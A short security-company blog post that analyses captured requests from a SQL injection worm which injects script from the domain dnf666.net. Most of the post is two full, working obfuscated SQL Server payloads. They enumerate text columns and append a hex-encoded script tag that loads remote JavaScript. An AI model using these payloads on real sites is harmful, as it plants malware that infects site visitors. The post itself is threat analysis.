Blog

SQL Injection worm with new injection domain dnf666.net

Our ZION SECURED WAMAF blocks a lot of attacks lately. Some attacks are worth investigating because they reveal new threats.

Most of you probably know about the Asprox worm? Seehttp://matchent.com/wpress/?q=node/419

This weekend a bot attacked this blog, protected by ZION SECURED WAMAF:

GET /blog/2010/2/26//solutions.aspx?show=Solutions';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20
cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%
20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.
xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20f
EtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0
)%20bEgIn%20exec('UpDaTe20%5B'%2B@t%2B'5D%20sEt20%5B'%2B@c%2B'%5D=rtrim(c
onvert(varchar(8000),%5B'%2B@c%2B'%5D))%2BcAsT(0x3C736372697074207372633D
687474703A2F2F7777772E646E663636362E6E65742F752E6A733E3C2F7363726970743E%
20aS%20vArChAr(53))%20where%20%5B'%2B@c%2B'5D%20not%20like%20''%dnf666%''')%20fEtCh%20next%20FrOm%20
tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20t
AbLe_cursoR;-- HTTP/1.1
User-Agent: curl/7.19.7 (i386-pc-win32) libcurl/7.19.7
Host: www.zionsecurity.com
Accept: *#

The User Agent indicates that this is not a browser but the well-known tool curl, running on Windows. This request wants to test if there is data in the database containing the string dnf666. Probably to see if the database is already infected with the malicious payload.

Because we don't reply with HTTP 500 error but redirect to the homepage instead, the worm attempts to inject its payload with the following GET request:

GET /blog/2010/2/26//solutions/code-review.aspx?show=Code+review';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR
%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,
sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20
(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20
b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_
cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20%5B'%2B@t%2B'%5D%20sEt%20%5B'%2B@c%2B'%5D=rtrim(convert(varchar(8000),%5B'%2B@c%2B'%5D))%2B
cAsT(0x3C736372697074207372633D687474703A2F2F7777772E646E663636362E6
E65742F752E6A733E3C2F7363726970743E%20aS%20vArChAr(53))%20where%20%5B'%2B@c%2B'%5D%20not%20like%20''%dnf666%''')%20fEtCh%20next%20FrOm%20tAbLe_
cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20
tAbLe_cursoR;-- HTTP/1.1
User-Agent: curl/7.19.7 (i386-pc-win32) libcurl/7.19.7
Host: www.zionsecurity.com
Accept: *#

Add comment